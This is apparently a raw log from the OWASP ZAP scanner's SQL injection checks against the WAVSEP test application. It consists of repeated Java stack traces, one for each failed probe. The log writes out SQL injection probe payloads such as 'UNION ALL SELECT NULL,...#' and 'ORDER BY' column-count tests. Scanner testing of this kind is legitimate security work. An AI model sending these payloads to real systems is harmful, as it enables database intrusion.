[ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682307 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682308 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682309 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682315 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682320 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ ORDER BY 7200#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ ORDER BY 7200# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9682321 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682322 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682323 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682324 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682324 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682325 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [ UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/ UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9682325 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini') ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at 